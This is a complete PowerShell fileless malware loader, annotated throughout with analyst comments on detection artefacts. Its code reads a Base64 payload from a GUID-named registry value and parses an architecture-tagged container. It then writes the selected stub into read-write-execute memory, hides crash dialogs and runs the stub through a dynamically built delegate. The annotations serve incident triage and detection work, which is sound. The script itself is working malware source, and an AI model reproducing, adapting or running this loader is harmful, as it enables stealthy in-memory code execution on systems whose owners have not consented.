- # Where the loader fetches its payload: a Base64 string stored as a registry
- # value (read by Get-ItemProperty further down). The value name is a GUID-like
- # string; an unexplained value of this shape under HKLM\...\Shell is an
- # artefact worth looking for on a host where this script is suspected to have run.
- $regpath = "HKLM:\Software\Microsoft\Windows\CurrentVersion\Shell";
- $regkey = "{4FF23B38-C5A1-5CBE-F25D458E1F8C5642}";
- # Builds, at run time, a delegate type with the given parameter types and return
- # type by emitting a new MulticastDelegate subclass into a dynamic assembly that
- # is run-only (AssemblyBuilderAccess::Run, never saved to disk). The resulting
- # type is later passed to Marshal::GetDelegateForFunctionPointer so that a raw
- # address can be invoked as a managed function. This is the widely copied
- # reflection-based delegate builder; the literals 'ReflectedDelegate',
- # 'InMemoryModule' and 'MyDelegateType' together with DefineDynamicAssembly are
- # practical things to match on in PowerShell script block logs.
- #   $Parameters - array of parameter types for Invoke (default: no parameters)
- #   $ReturnType - return type of Invoke (default: [Void])
- # Outputs the newly created [Type].
- function Get-DelegateType
- {
- Param
- (
- [OutputType([Type])]
- [Parameter( Position = 0)]
- [Type[]]
- $Parameters = (New-Object Type[](0)),
- [Parameter( Position = 1 )]
- [Type]
- $ReturnType = [Void]
- )
- $Domain = [AppDomain]::CurrentDomain
- $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')
- $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
- $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false)
- # A delegate type is a sealed class deriving from MulticastDelegate whose
- # constructor and Invoke method are both runtime-managed (no IL body needed).
- $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
- $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters)
- $ConstructorBuilder.SetImplementationFlags('Runtime, Managed')
- $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)
- $MethodBuilder.SetImplementationFlags('Runtime, Managed')
- Write-Output $TypeBuilder.CreateType()
- }
- # Reads four bytes starting at $offset as a big-endian (most significant byte
- # first) 32-bit value; the "BI" suffix presumably stands for big-endian integer.
- # Used to parse the length and offset fields of the payload container.
- # No bounds check: an offset at or past the end of the array yields $null
- # elements, which PowerShell arithmetic appears to treat as 0 — TODO confirm;
- # the caller relies on its own length guard instead.
- function bytesToIntegerBI($byteArrayInput, $offset) {
- $returnedInt = $byteArrayInput[$offset+0] * 16777216;
- $returnedInt += $byteArrayInput[$offset+1] * 65536;
- $returnedInt += $byteArrayInput[$offset+2] * 256;
- $returnedInt += $byteArrayInput[$offset+3] * 1;
- return $returnedInt;
- }
- # C# P/Invoke declarations for the four kernel32 functions the loader needs,
- # compiled into the session by Add-Type below. Note that WriteProcessMemory's
- # last parameter is declared as a plain uint instead of a pointer to the
- # bytes-written count; the callers pass 0 (NULL), which the API accepts, so the
- # count is simply discarded.
- $externalFuncs = @"
- [DllImport("kernel32.dll")]
- public static extern IntPtr GetCurrentProcess();
- [DllImport("kernel32.dll")]
- public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
- [DllImport("kernel32.dll")]
- public static extern bool WriteProcessMemory(IntPtr process, IntPtr address, byte[] buffer, uint size, uint written);
- [DllImport("kernel32.dll")]
- public static extern uint SetErrorMode(uint uMode);
- "@
- # Compiles the declarations above into the type Win32Functions.Win32 and keeps a
- # reference to it (-passthru). On Windows PowerShell, Add-Type compiles through
- # csc.exe and writes a temporary .cs/.dll under the user's temp directory — a
- # child-process and file-write event that is a practical detection point.
- $cFuncsCallable = Add-Type -memberDefinition $externalFuncs -Name "Win32" -namespace Win32Functions -passthru;
- # Copies a per-architecture code stub and the full payload blob into two fresh
- # memory regions of the current process, then calls into the stub.
- #   $lExternalFuncs - bytes of the stub selected by processShellcode
- #   $funcOffset     - offset of the entry point within that stub
- #   $fullShellcode  - the entire decoded payload, handed to the stub as an argument
- # Uses the script-scoped $cFuncsCallable type created by Add-Type above.
- # Returns nothing; whatever the stub does happens inside this process.
- function shellExec($lExternalFuncs, $funcOffset, $fullShellcode) {
- $curProcess = $cFuncsCallable::GetCurrentProcess();
- # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE: both regions
- # are allocated writable and executable at once. A private RWX allocation inside
- # a PowerShell host is a well-known telemetry signal for this kind of loader.
- # Neither return value is checked for NULL.
- $rwxPage1 = $cFuncsCallable::VirtualAlloc(0,$lExternalFuncs.Length,0x00003000,0x40);
- $rwxPage2 = $cFuncsCallable::VirtualAlloc(0,$fullShellcode.Length,0x00003000,0x40);
- # WriteProcessMemory against the current process, i.e. an indirect memcpy. The
- # bytes-written argument is 0 and the result is piped to Out-Null, so failures
- # are silent.
- $cFuncsCallable::WriteProcessMemory($curProcess, $rwxPage1, $lExternalFuncs, $lExternalFuncs.Length, 0) | Out-Null;
- $cFuncsCallable::WriteProcessMemory($curProcess, $rwxPage2, $fullShellcode, $fullShellcode.Length, 0) | Out-Null;
- # Entry address = stub base + offset, wrapped in a (IntPtr, IntPtr) -> void
- # delegate so the managed runtime can call it directly. GetDelegateForFunctionPointer
- # on a heap address is the other strong signal here.
- $funcHndl = [IntPtr]($rwxPage1.ToInt64()+$funcOffset);
- $funcDelegate = Get-DelegateType @([IntPtr], [IntPtr]) ([Void]);
- $scFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($funcHndl, $funcDelegate);
- # 0x8006 = SEM_NOGPFAULTERRORBOX | SEM_NOALIGNMENTFAULTEXCEPT | SEM_NOOPENFILEERRORBOX:
- # suppresses the crash dialog if the stub faults, so a failed run is less
- # likely to be noticed by the interactive user.
- $cFuncsCallable::SetErrorMode(0x8006) | Out-Null;
- # Control transfers to the stub with (pointer to full payload, pointer to stub base).
- $scFunc.Invoke($rwxPage2, $rwxPage1);
- }
- # Walks the decoded container and hands the record matching the current
- # architecture to shellExec.
- # Container layout as implied by the offsets used here:
- #   byte 0       : zeroed by the caller before parsing (meaning not shown here)
- #   bytes 1..4   : total length, big-endian
- #   from byte 5  : records of [1-byte arch tag][4-byte stub length, big-endian]
- #                  [4-byte entry offset, big-endian][stub bytes]
- #   $shellcodeEnc - the decoded byte array
- #   $mode64or32   - tag to select: the caller passes 2 on a 64-bit host, 1 on 32-bit
- # Returns nothing. If no record matches, the loop simply runs off the end.
- function processShellcode($shellcodeEnc, $mode64or32) {
- $length = bytesToIntegerBI $shellcodeEnc 1;
- $index = 5;
- # A record needs at least its 9-byte header, hence the +8 guard.
- while ($index+8 -lt $length) {
- $byte = $shellcodeEnc[$index];
- $int1 = bytesToIntegerBI $shellcodeEnc ($index+1);
- $funcOffset = bytesToIntegerBI $shellcodeEnc ($index+5);
- # Skip the header; $index now points at the first stub byte.
- $index += 9;
- if ($byte -eq $mode64or32) {
- # NOTE: PowerShell's range operator is inclusive, so this slice is $int1+1
- # bytes long — one byte more than the declared stub length.
- shellExec $shellcodeEnc[$index..($index+$int1)] $funcOffset $shellcodeEnc;
- break;
- } else {
- # Not our architecture: advance past this record's stub bytes.
- $index += $int1;
- }
- }
- }
- # Entry point: read the Base64 blob from the registry value named at the top,
- # decode it, and dispatch on pointer size (8 bytes = 64-bit PowerShell host).
- # Everything after this point happens in memory; the registry value is the only
- # durable artefact, which makes it the thing to look for during triage.
- $base64shellcode = (Get-ItemProperty -Path "$regpath" -Name "$regkey").$regkey;
- $shellcodeEnc = [System.Convert]::FromBase64String($base64shellcode);
- # The first byte is cleared before parsing; its meaning is not shown in this
- # script (possibly a flag consumed by the stub — unverified).
- $shellcodeEnc[0] = 0;
- if ([IntPtr]::Size -eq 8) {
- processShellcode $shellcodeEnc 2;
- } else {
- processShellcode $shellcodeEnc 1;
- }